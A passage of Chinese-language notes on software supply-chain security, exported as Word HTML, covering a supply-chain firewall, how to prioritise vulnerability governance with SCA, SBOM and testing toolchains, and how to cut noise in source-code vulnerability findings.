Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#3C87CD;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">供应链防火墙的思路</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">供应链防火墙的思路旨在通过在企业内部建立一个虚拟的安全检查点，来管控和监督所有进出企业内网的软件组件，从而提高软件供应链的整体安全性。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2.3 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">供应链安全的核心诉求</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#3C87CD;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">供应链风险治理就是优先级建议</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;background:#FF00FF;mso-highlight:#FF00FF;">【思】上述提法很到位，治理本质上是一个过滤复杂性的问题。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 本质问题：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>过滤复杂性，识别真正需要关注的风险</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 优先考虑因素：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>是否有修复方案</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>漏洞是否可利用、可达</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>是否有补丁、缓解配置或热补丁</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>其他工具的交叉检测结果</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 基本信息分析：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>漏洞的基本信息（名称、严重程度等）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>依赖信息</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>临时修复方法</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>POC/EXP 可用性</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>补丁包情况</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 进阶分析：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>漏洞可达性分析</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合代码审计能力</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>分析漏洞可达链路</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>判断漏洞的真实性和可利用性</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 工具链整合：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合ASTS（应用安全测试工具链）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>包括白盒、黑盒、运行时交互式灰盒测试</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>与SCA工具结合进行漏洞排序</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 6. 修复措施评估：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>组件/中间件升级</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>补丁应用</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>环境配置调整</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>热补丁/运行时插桩</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>WAF规则</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>策略管控（白名单、质量门禁等）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 7. 供应商风险评估：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>评估商业采购和开源项目</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>分析自研、采购和开源软件</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>评估补丁包、更新包</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>分析物料清单、源码文件、二进制文件</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 8. 风险报告生成：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>包含漏洞信息、许可证信息、敏感信息配置等</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>描绘供应商风险画像</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 9. 供应链安全管理平台（SCS）：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>集成各种来源的软件检测和管理</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>支持软件资产测绘和风险分析</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合业务环境和外部系统</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>对接态势感知系统</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 10. 目标：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>以SCA为核心建立企业级供应链安全管理平台</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>使用SBOM描述和定位资产信息</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>实现风险快速溯源</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>提高漏洞响应效率</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>实现从引入到生成到运行的闭环管理</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 这种方法旨在通过</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">多维度分析和工具整合</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">，为供应链风险治理提供更精准的优先级建议，从而提高安全管理的效率和有效性。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">源码漏洞降噪</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">供应链安全左侧的漏洞如何降噪减轻运行压力？</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 利用SCA（软件成分分析）技术：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>深入分析漏洞信息，包括基本信息（名称、严重等级、修复方法）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>运营更深层次的漏洞信息（触发条件、POC和EXP可利用性）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>根据深入信息研判漏洞修复优先级</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>识别漏洞的入口函数和触发函数</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 结合代码审计：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>检测自研代码中是否使用了开源项目中的风险代码</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 工具链联动：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合ASGS（应用安全测试工具链）和SCA</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>判断漏洞引入的阶段和环节</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>评估漏洞的真实性</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 多维度分析：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>分析代码中声明的软件与实际构建时引入的软件的差异</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>评估构建引入的软件在运行时是否真正使用</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 运行时技术：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>使用运行时分析技术研判软件实际使用情况</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 6. 多技术融合：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>综合使用多种ISA（Information Security Architecture）技术手段</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>收敛和分析来自不同层面的数据</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 7. 针对自研代码：</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 